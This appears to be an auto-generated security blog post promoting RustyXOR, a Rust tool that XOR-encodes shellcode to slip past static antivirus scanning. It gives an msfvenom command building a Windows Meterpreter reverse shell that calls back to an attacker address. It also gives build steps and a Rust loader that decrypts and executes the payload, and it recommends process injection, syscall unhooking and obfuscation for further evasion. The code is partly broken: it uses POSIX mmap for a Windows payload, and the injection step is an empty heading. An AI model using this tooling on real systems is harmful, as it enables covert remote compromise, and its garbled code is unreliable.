Listen to this Post
RustyXOR is a custom shellcode encoder designed to bypass static antivirus detection by leveraging XOR encryption. Unlike AES and other encryption algorithms that may leave traces via WinAPI calls, XOR is more efficient and stealthier. This tool has been tested with custom Rust loaders and msfvenom shellcodes, successfully evading Windows Defender in local setups.
GitHub Repo: RustyXOR
AVScan Results: Scan Report
You Should Know: Practical Implementation of RustyXOR
1. Generating Shellcode with msfvenom
First, generate a raw shellcode payload using `msfvenom`:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.bin
2. Encoding Shellcode with RustyXOR**
Clone the RustyXOR repository and encode the payload:
git clone https://github.com/[USER]/RustyXOR.git cd RustyXOR cargo build --release ./target/release/rustyxor -i payload.bin -o encoded_payload.bin -k "MySecretKey"
3. Loading Encoded Shellcode in Rust
Use a Rust loader to execute the encoded shellcode:
use std::fs::File;
use std::io::Read;
fn main() {
let mut file = File::open("encoded_payload.bin").unwrap();
let mut buffer = Vec::new();
file.read_to_end(&mut buffer).unwrap();
// XOR Decryption Routine
let key = b"MySecretKey";
let decrypted: Vec = buffer.iter().enumerate()
.map(|(i, &x)| x ^ key[i % key.len()])
.collect();
// Execute Shellcode
let exec = unsafe {
let mem = libc::mmap(
std::ptr::null_mut(),
decrypted.len(),
libc::PROT_READ | libc::PROT_WRITE | libc::PROT_EXEC,
libc::MAP_ANON | libc::MAP_PRIVATE,
-1,
0,
);
std::ptr::copy_nonoverlapping(decrypted.as_ptr(), mem as *mut u8, decrypted.len());
std::mem::transmute::<_, fn()>(mem)
};
exec();
}
4. Bypassing AV with Process Injection
Use process hollowing or DLL injection to evade runtime detection:
<h1>Process Hollowing Example (C++/Rust)</h1> <h1>Inject into a benign process like explorer.exe</h1>
5. Verifying Stealth with Sysinternals
Check for suspicious memory allocations using `Process Explorer` or Process Hacker.
What Undercode Say
RustyXOR demonstrates how simple XOR encryption can effectively bypass static AV detection. However, modern EDR solutions may still catch runtime behavior. Combining XOR with:
– Process Injection (CreateRemoteThread, NtCreateThreadEx)
– API Unhooking (Direct syscalls via syswhispers3)
– Obfuscation (LLVM-based obfuscators like OLLVM)
strengthens evasion. Always test in isolated environments before real engagements.
Expected Output:
A functional Rust-based shellcode encoder/decoder that bypasses static detection while maintaining execution stability.
Relevant URLs:
References:
Reported By: Aidenmonish Rust – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
